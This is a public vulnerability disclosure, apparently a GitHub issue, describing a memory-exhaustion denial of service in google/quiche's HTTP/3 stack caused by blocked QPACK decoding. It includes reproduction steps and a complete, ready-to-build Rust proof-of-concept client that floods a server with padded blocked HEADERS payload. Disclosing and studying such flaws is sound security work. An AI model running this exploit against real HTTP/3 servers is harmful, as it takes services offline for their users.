Denial-of-Service Attack Against the HTTP/3 Stack via QPACK Blocked Decoding #105
Description
Hi! We've decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.
Please feel free to publicly disclose this issue on GitHub as a public issue.
Thanks again for your report and time,
The Google Bug Hunter Team
Vulnerability type: Denial of Service (DoS)
Details
Vulnerability Description
The issue is not a simple QPACK decoding failure. The root cause is that, when a QPACK header block becomes blocked waiting for dynamic table updates, the corresponding HTTP/3 HEADERS payload bytes are accounted for as consumed by the QUIC receive-flow-control path, while the same bytes are still retained in an internal heap buffer inside the QPACK decoder.
In the affected design, HEADERS frame payload is delivered progressively to the HTTP/3/QPACK layer rather than being fully buffered and bounded before processing. If the header block prefix declares a Required Insert Count that depends on dynamic table entries not yet received on the QPACK encoder stream, the decoder enters a blocked state. Once blocked, subsequent header block bytes are appended to an internal decoder buffer and are not semantically decoded until the required dynamic table insertions arrive.
However, on the request stream path, the implementation still marks the received payload as consumed after each decode call. As a result, stream-level and connection-level flow-control windows are returned to the peer even though the payload bytes are still resident in heap memory. This creates a discrepancy between protocol-level accounting and actual memory retention.
HTTP/3 HEADERS frames are processed in a streaming manner and are not subject to the buffered-frame payload cap applied to certain other HTTP/3 frame types. In addition, the blocked-stream limit only constrains the number of concurrently blocked header blocks, not the retained size of each blocked block. An attacker can therefore keep feeding additional HEADERS payload bytes into the hidden decoder-side heap buffer, which in practice leads to unbounded memory growth and denial of service of the HTTP/3 stack.
In one sentence, the vulnerability can be summarized as follows:
During blocked QPACK decoding, HEADERS payload is released from QUIC receive-flow-control accounting before it becomes safely releasable in memory, causing the payload to accumulate in an internal heap buffer that is no longer effectively bounded by QUIC flow control.
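The accounting mismatch can be illustrated with a toy model (all names here are hypothetical illustrations, not quiche code): the affected path returns flow-control credit for every blocked HEADERS byte, so the peer-visible window keeps refilling while the decoder-side buffer keeps growing in lockstep.

```rust
// Toy model of the discrepancy (hypothetical names, not quiche code):
// flow-control credit is returned for bytes that remain buffered, so
// the protocol-level window never pushes back on actual memory use.

struct BlockedDecoderModel {
    flow_control_credit_returned: u64, // bytes the peer may send again
    buffered_bytes: u64,               // bytes still resident on the heap
}

impl BlockedDecoderModel {
    fn new() -> Self {
        Self { flow_control_credit_returned: 0, buffered_bytes: 0 }
    }

    // Models the affected path: payload is marked consumed (credit
    // returned) even though the blocked decoder keeps it buffered.
    fn on_blocked_headers_payload(&mut self, len: u64) {
        self.flow_control_credit_returned += len;
        self.buffered_bytes += len;
    }
}

fn main() {
    let mut model = BlockedDecoderModel::new();
    for _ in 0..1000 {
        model.on_blocked_headers_payload(4096);
    }
    // Every buffered byte has already been re-credited to the peer,
    // so flow control never bounds the retained memory.
    assert_eq!(model.flow_control_credit_returned, model.buffered_bytes);
    println!("retained: {} bytes", model.buffered_bytes);
}
```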
Attack Preconditions
- The target uses IETF QUIC with HTTP/3 enabled.
- The server supports the QPACK dynamic table.
- The server permits blocked QPACK streams (commonly with QPACK_BLOCKED_STREAMS = 100 by default, or another non-zero value).
- The attacker can establish at least one normal HTTP/3 connection to the target service.
- The attacker can send a syntactically valid HEADERS frame whose QPACK header block prefix declares dependence on a dynamic table entry that has not yet arrived.
In deployments using google/quiche as the HTTP/3 server core, these conditions are met by default. Therefore, no additional privileges, authentication, or special access are required beyond the ability to interact with the service as a normal remote HTTP/3 client.
Reproduction Steps / POC
Target / Product Information
- Target class: HTTP/3 servers or applications built on the affected HTTP/3/QPACK stack behavior.
- Relevant components involved in the issue include:
- quiche/quic/core/qpack/qpack_progressive_decoder.cc
- quiche/quic/core/http/quic_spdy_stream.cc
- quiche/quic/core/qpack/qpack_decoded_headers_accumulator.cc
The tested server was bazel-bin/quiche/quic_server, built from the google/quiche codebase and started with its default parameters exposing HTTP/3 service.
Under this deployment model, the attack preconditions described above are satisfied by default, so the attack requires only the ability to interact with the server as a normal remote HTTP/3 client.
Minimal Reproduction Conditions
- Only one QUIC connection is required for a minimal reproduction.
- Multiple request streams on the same connection can be used to amplify the effect.
Reproduction Procedure
- Establish a normal HTTP/3 connection and complete the QUIC handshake.
- On the client control stream, send a valid SETTINGS frame so that the HTTP/3 session is fully initialized.
- Open a request bidirectional stream.
- Send a HEADERS frame on that request stream.
- Construct the QPACK header block prefix so that it declares a dependency on a dynamic table entry that has not yet been inserted. A minimal blocked prefix may resemble the bytes 02 00 80, which express a non-zero Required Insert Count followed by an indexed reference to a missing dynamic table entry, causing the decoder to wait.
- Continue transmitting additional fragments belonging to the same HEADERS frame payload on the request stream.
- Do not send the corresponding QPACK encoder stream insertions required to satisfy the declared dependency.
- Continue feeding more HEADERS payload bytes on the same blocked request stream, or repeat the same pattern across multiple request streams on the same connection.
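The prefix bytes used in the steps above can be derived with a small sketch of QPACK's prefix-integer wire layout (per RFC 9204; `encode_prefix_int` and `blocked_prefix` are illustrative helpers and not part of either quiche project):

```rust
// Sketch of the three-byte blocked header block prefix. This is an
// illustrative encoder following RFC 9204's wire layout, not code
// taken from google/quiche or cloudflare/quiche.

/// Encode an integer with an N-bit prefix (RFC 7541 Section 5.1,
/// reused by QPACK), OR-ing `first_byte_flags` into the first byte.
fn encode_prefix_int(value: u64, prefix_bits: u8, first_byte_flags: u8) -> Vec<u8> {
    let max_prefix = (1u64 << prefix_bits) - 1;
    if value < max_prefix {
        return vec![first_byte_flags | value as u8];
    }
    let mut out = vec![first_byte_flags | max_prefix as u8];
    let mut rest = value - max_prefix;
    while rest >= 128 {
        out.push((rest % 128) as u8 | 0x80);
        rest /= 128;
    }
    out.push(rest as u8);
    out
}

fn blocked_prefix() -> Vec<u8> {
    let mut block = Vec::new();
    // Encoded Required Insert Count = 2 (8-bit prefix): declares a
    // dependency on a dynamic table insertion the server has not seen.
    block.extend(encode_prefix_int(2, 8, 0x00));
    // S = 0, Delta Base = 0 (7-bit prefix): Base follows the
    // Required Insert Count.
    block.extend(encode_prefix_int(0, 7, 0x00));
    // Indexed Field Line, T = 0 (dynamic table), relative index 0:
    // references the never-inserted first dynamic table entry.
    block.extend(encode_prefix_int(0, 6, 0x80));
    block
}

fn main() {
    assert_eq!(blocked_prefix(), vec![0x02, 0x00, 0x80]);
    println!("{:02x?}", blocked_prefix());
}
```

Because the referenced insertion never arrives on the encoder stream, a decoder that honors this prefix must hold the remainder of the header block until the dependency is satisfied.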
Expected Result / Reproduction Output
- The server does not necessarily terminate the connection immediately.
- The affected request stream remains stalled in a QPACK-blocked state while waiting for encoder stream updates.
- Additional HEADERS payload bytes continue to accumulate in the decoder’s internal heap buffer.
- At the same time, the implementation may already mark those bytes as consumed from the QUIC stream/sequencer perspective and return flow-control credit to the peer.
- The peer can therefore continue sending more data within the same connection, even though memory usage on the server continues to grow.
- At the application level, the observable symptom is typically that the request remains pending indefinitely while server memory usage increases abnormally, eventually leading to service degradation or denial of service.
Proof-of-Concept Implementation
- A proof-of-concept client was implemented using the cloudflare/quiche library to trigger the issue.
- Build Instructions
- Place poc.rs in the following directory within the cloudflare/quiche repository: quiche/h3i/src/bin/
- From the repository root, build the PoC binary with: cargo build -p h3i --bin poc
- Usage
- Run the PoC as follows: target/debug/poc [host(server_name):port]
The PoC establishes a normal HTTP/3 connection and sends a crafted HEADERS sequence designed to place QPACK decoding into a blocked state while continuing to deliver additional HEADERS payload bytes without satisfying the required dynamic table dependency.
Using the PoC program described above, I reproduced the issue and documented the result in poc.png. In my testing, a single malicious HTTP/3 connection was sufficient to cause the server to retain more than 30 GB of memory, confirming that the issue is practically exploitable as a severe remote DoS.
Attack scenario
The vulnerability is remotely exploitable by any user who can access the target’s HTTP/3 service. When google/quiche is used as the server-side HTTP/3 implementation, the vulnerable conditions are satisfied under normal operation. An attacker does not need authentication, elevated privileges, or multiple connections. A single malicious client connection is sufficient to keep the server in a state where HEADERS payload is continuously retained in heap memory without an effective upper bound. As a result, one attacker can progressively consume all available server memory and trigger a denial of service. In other words, any Internet-facing service built on google/quiche and permitting HTTP/3 traffic is exposed to practical remote DoS risk.
POC
use std::env;
use std::path::Path;
use std::time::Duration;
use clap::App;
use clap::Arg;
use h3i::actions::h3::Action;
use h3i::actions::h3::WaitType;
use h3i::client::sync_client;
use h3i::config::Config;
use h3i::HTTP3_CONTROL_STREAM_TYPE_ID;
use h3i::QPACK_DECODER_STREAM_TYPE_ID;
use h3i::QPACK_ENCODER_STREAM_TYPE_ID;
use quiche::h3::frame::Frame;
use quiche::h3::Header;
use quiche::h3::NameValue;
const CONTROL_STREAM_ID: u64 = 2;
const QPACK_ENCODER_STREAM_ID: u64 = 6;
const QPACK_DECODER_STREAM_ID: u64 = 10;
const SSLKEYLOGFILE_PATH: &str = "/media/john/Data/key.log";
fn main() -> Result<(), String> {
    let mut log_builder = env_logger::builder();
    if env::var_os("RUST_LOG").is_none() {
        log_builder.filter_level(log::LevelFilter::Info);
    }
    log_builder.format_timestamp_nanos().init();

    prepare_sslkeylogfile()?;

    let options = parse_options()?;
    let config = build_client_config(&options)?;
    let actions = build_actions(&options);

    let summary = sync_client::connect(config, actions, None)
        .map_err(|e| format!("connection failed: {e:?}"))?;

    println!(
        "{}",
        serde_json::to_string_pretty(&summary)
            .map_err(|e| format!("failed to serialize summary: {e}"))?
    );
    Ok(())
}

fn prepare_sslkeylogfile() -> Result<(), String> {
    let path = Path::new(SSLKEYLOGFILE_PATH);
    if let Some(parent) = path.parent() {
        std::fs::create_dir_all(parent).map_err(|e| {
            format!(
                "failed to create SSLKEYLOGFILE directory {}: {e}",
                parent.display()
            )
        })?;
    }
    env::set_var("SSLKEYLOGFILE", path);
    log::info!("writing TLS key log to {}", path.display());
    Ok(())
}
struct Options {
    host_port: String,
    connect_to: Option<String>,
    server_name: Option<String>,
    omit_sni: bool,
    verify_peer: bool,
    idle_timeout_ms: u64,
    payload_len: usize,
    chunk_size: usize,
    chunk_wait_ms: u64,
    stream_wait_ms: u64,
    initial_wait_ms: u64,
    final_wait_ms: u64,
    request_count: usize,
}
fn parse_options() -> Result<Options, String> {
    let matches = App::new("qpack-blocked-decode-amplified")
        .about("Send blocked QPACK HEADERS frames over multiple request streams")
        .arg(
            Arg::with_name("host:port")
                .help("Hostname and port of the HTTP/3 server")
                .required(true)
                .index(1),
        )
        .arg(
            Arg::with_name("connect-to")
                .long("connect-to")
                .help(
                    "Set a specific IP address to connect to, rather than \
                     use DNS resolution",
                )
                .takes_value(true),
        )
        .arg(
            Arg::with_name("server-name")
                .long("server-name")
                .help("Override the TLS SNI server name")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("omit-sni")
                .long("omit-sni")
                .help("Omit the SNI from the TLS handshake")
                .takes_value(false),
        )
        .arg(
            Arg::with_name("no-verify")
                .long("no-verify")
                .help("Don't verify server certificate")
                .takes_value(false),
        )
        .arg(
            Arg::with_name("idle-timeout")
                .long("idle-timeout")
                .help("The QUIC idle timeout value in milliseconds")
                .default_value("25000")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("payload-len")
                .long("payload-len")
                .help("Raw QPACK payload length per request stream in bytes")
                .default_value("8388608000")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("chunk-size")
                .long("chunk-size")
                .help("Bytes sent per StreamBytes action")
                .default_value("4096")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("chunk-wait-ms")
                .long("chunk-wait-ms")
                .help("Delay between chunks on the same request stream")
                .default_value("2")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("stream-wait-ms")
                .long("stream-wait-ms")
                .help("Delay between request streams")
                .default_value("5")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("initial-wait-ms")
                .long("initial-wait-ms")
                .help("Delay after sending SETTINGS")
                .default_value("10")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("final-wait-ms")
                .long("final-wait-ms")
                .help("Delay after the last request chunk before close")
                .default_value("400")
                .takes_value(true),
        )
        .arg(
            Arg::with_name("request-count")
                .long("request-count")
                .help("Number of client-initiated bidirectional request streams")
                .default_value("4")
                .takes_value(true),
        )
        .get_matches();

    let chunk_size = parse_value::<usize>(&matches, "chunk-size")?;
    let request_count = parse_value::<usize>(&matches, "request-count")?;
    if chunk_size == 0 {
        return Err("chunk-size must be greater than 0".to_string());
    }
    if request_count == 0 {
        return Err("request-count must be greater than 0".to_string());
    }

    Ok(Options {
        host_port: matches.value_of("host:port").unwrap().to_string(),
        connect_to: matches.value_of("connect-to").map(ToString::to_string),
        server_name: matches.value_of("server-name").map(ToString::to_string),
        omit_sni: matches.is_present("omit-sni"),
        verify_peer: !matches.is_present("no-verify"),
        idle_timeout_ms: parse_value(&matches, "idle-timeout")?,
        payload_len: parse_value(&matches, "payload-len")?,
        chunk_size,
        chunk_wait_ms: parse_value(&matches, "chunk-wait-ms")?,
        stream_wait_ms: parse_value(&matches, "stream-wait-ms")?,
        initial_wait_ms: parse_value(&matches, "initial-wait-ms")?,
        final_wait_ms: parse_value(&matches, "final-wait-ms")?,
        request_count,
    })
}
fn parse_value<T>(matches: &clap::ArgMatches, name: &str) -> Result<T, String>
where
    T: std::str::FromStr,
    T::Err: std::fmt::Display,
{
    matches
        .value_of(name)
        .unwrap()
        .parse()
        .map_err(|e| format!("{name} parse error: {e}"))
}
fn build_client_config(options: &Options) -> Result<Config, String> {
    let mut config = Config::new()
        .with_host_port(options.host_port.clone())
        .with_idle_timeout(options.idle_timeout_ms)
        .verify_peer(options.verify_peer);
    if options.omit_sni {
        config = config.omit_sni();
    }
    if let Some(connect_to) = &options.connect_to {
        config = config.with_connect_to(connect_to.clone());
    }
    if let Some(server_name) = &options.server_name {
        config = config.with_server_name(server_name.clone());
    }
    config
        .build()
        .map_err(|e| format!("invalid configuration: {e}"))
}
fn build_actions(options: &Options) -> Vec<Action> {
    let request_streams = request_stream_ids(options.request_count);
    let qpack_payload = blocked_qpack_payload_with_padding(options.payload_len);
    let mut actions = Vec::new();

    // Open the HTTP/3 control stream and send SETTINGS so the session
    // is fully initialized before the request streams start.
    actions.push(Action::OpenUniStream {
        stream_id: CONTROL_STREAM_ID,
        fin_stream: false,
        stream_type: HTTP3_CONTROL_STREAM_TYPE_ID,
    });
    actions.push(Action::SendFrame {
        stream_id: CONTROL_STREAM_ID,
        fin_stream: false,
        frame: Frame::Settings {
            max_field_section_size: None,
            qpack_max_table_capacity: None,
            qpack_blocked_streams: Some(request_streams.len() as u64 + 2),
            connect_protocol_enabled: None,
            h3_datagram: None,
            grease: None,
            additional_settings: None,
            raw: None,
        },
    });

    // Open the QPACK encoder and decoder streams, but never send the
    // dynamic table insertions the header blocks depend on.
    actions.push(Action::OpenUniStream {
        stream_id: QPACK_ENCODER_STREAM_ID,
        fin_stream: false,
        stream_type: QPACK_ENCODER_STREAM_TYPE_ID,
    });
    actions.push(Action::OpenUniStream {
        stream_id: QPACK_DECODER_STREAM_ID,
        fin_stream: false,
        stream_type: QPACK_DECODER_STREAM_TYPE_ID,
    });
    actions.push(Action::FlushPackets);

    if options.initial_wait_ms > 0 {
        actions.push(wait_action(options.initial_wait_ms));
    }

    for (index, stream_id) in request_streams.iter().enumerate() {
        append_raw_headers_stream_script(
            &mut actions,
            *stream_id,
            &qpack_payload,
            options.chunk_size,
            options.chunk_wait_ms,
        );
        if options.stream_wait_ms > 0 && index + 1 != request_streams.len() {
            actions.push(wait_action(options.stream_wait_ms));
        }
    }

    if options.final_wait_ms > 0 {
        actions.push(wait_action(options.final_wait_ms));
    }

    // actions.push(Action::ConnectionClose {
    //     error: quiche::ConnectionError {
    //         is_app: true,
    //         error_code: quiche::h3::WireErrorCode::NoError as u64,
    //         reason: vec![],
    //     },
    // });

    actions
}
// Client-initiated bidirectional streams use IDs 0, 4, 8, ...
fn request_stream_ids(request_count: usize) -> Vec<u64> {
    (0..request_count).map(|index| index as u64 * 4).collect()
}

fn wait_action(ms: u64) -> Action {
    Action::Wait {
        wait_type: WaitType::WaitDuration(Duration::from_millis(ms)),
    }
}
// QUIC variable-length integer encoding (RFC 9000, Section 16).
fn encode_varint(value: u64) -> Vec<u8> {
    match value {
        0..=63 => vec![value as u8],
        64..=16_383 => ((value as u16) | 0x4000).to_be_bytes().to_vec(),
        16_384..=1_073_741_823 => {
            ((value as u32) | 0x8000_0000).to_be_bytes().to_vec()
        },
        _ => (value | 0xc000_0000_0000_0000).to_be_bytes().to_vec(),
    }
}

// HTTP/3 HEADERS frame: type (0x1), payload length, then the raw
// QPACK header block bytes.
fn raw_headers_frame_bytes(payload: &[u8]) -> Vec<u8> {
    let mut frame = encode_varint(0x1);
    frame.extend(encode_varint(payload.len() as u64));
    frame.extend_from_slice(payload);
    frame
}
fn append_raw_headers_stream_script(
    actions: &mut Vec<Action>, stream_id: u64, qpack_payload: &[u8],
    chunk_size: usize, inter_chunk_wait_ms: u64,
) {
    let frame_bytes = raw_headers_frame_bytes(qpack_payload);
    for (index, chunk) in frame_bytes.chunks(chunk_size).enumerate() {
        actions.push(Action::StreamBytes {
            stream_id,
            fin_stream: false,
            bytes: chunk.to_vec(),
        });
        actions.push(Action::FlushPackets);
        if inter_chunk_wait_ms > 0
            && index + 1 != frame_bytes.len().div_ceil(chunk_size)
        {
            actions.push(wait_action(inter_chunk_wait_ms));
        }
    }
}
// Pads the blocked header block out to `total_len` bytes; the filler
// keeps the decoder buffering while it waits for the missing entry.
fn blocked_qpack_payload_with_padding(total_len: usize) -> Vec<u8> {
    let mut payload = blocked_qpack_payload();
    if total_len > payload.len() {
        payload.resize(total_len, b'A');
    }
    payload
}

fn blocked_qpack_payload() -> Vec<u8> {
    let padding_headers = vec![
        Header::new(b"x-pad-a", b"aaaaaaaaaaaaaaaa"),
        Header::new(b"x-pad-b", b"bbbbbbbbbbbbbbbb"),
    ];
    // Encode filler headers, then strip their two-byte header block
    // prefix so only the field line representations remain.
    let mut tail = encode_header_block(&padding_headers).unwrap_or_default();
    tail = tail.get(2..).unwrap_or_default().to_vec();
    // Blocked prefix: non-zero Required Insert Count (0x02), Delta Base 0
    // (0x00), then an Indexed Field Line (0x80) referencing a dynamic
    // table entry that the encoder stream never inserts.
    let mut payload = vec![0x02, 0x00, 0x80];
    payload.extend(tail);
    payload
}

fn encode_header_block(
    headers: &[quiche::h3::Header],
) -> std::result::Result<Vec<u8>, String> {
    let mut encoder = quiche::h3::qpack::Encoder::new();
    let headers_len = headers
        .iter()
        .fold(0, |acc, h| acc + h.value().len() + h.name().len() + 32);
    let mut header_block = vec![0; headers_len];
    let len = encoder
        .encode(headers, &mut header_block)
        .map_err(|_| "Internal Error".to_string())?;
    header_block.truncate(len);
    Ok(header_block)
}